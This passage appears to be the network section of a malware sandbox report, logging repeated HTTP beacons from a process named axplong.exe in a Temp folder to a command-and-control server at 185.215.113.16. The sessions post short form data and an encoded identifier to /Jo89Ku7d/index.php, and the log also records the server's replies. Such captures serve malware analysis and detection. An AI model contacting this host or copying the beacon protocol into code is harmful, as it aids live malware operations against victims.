26	192.168.2.4	49763	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:34.919627905 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:35.669430971 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:35.670131922 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:35.919836044 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49764	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:36.029288054 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:36.798681974 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:36.799458027 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:37.051630974 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49765	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:37.169457912 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:37.918744087 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:37.922987938 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:38.171402931 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49766	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:38.306252003 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:39.064563990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:39.065433979 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:39.314862967 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49767	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:39.435302973 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:40.209242105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:40.267534971 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:40.528172970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49768	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:40.839838028 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:41.585146904 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:41.586144924 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:41.832851887 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49769	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:41.950819969 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:42.694195032 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:42.695938110 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:42.943170071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49770	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:43.599940062 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:44.135832071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:44.136554956 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:44.386406898 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49771	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:44.497567892 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:45.240293980 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:45.240966082 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:45.487993002 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49772	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:45.667054892 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:46.440745115 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:46.441507101 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:46.696155071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49773	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:46.810234070 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:47.560755014 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:47.562408924 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:47.810544968 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49774	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:47.919537067 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:48.695293903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:48.702491999 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:48.955461025 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49775	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:49.078624964 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:49.837634087 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
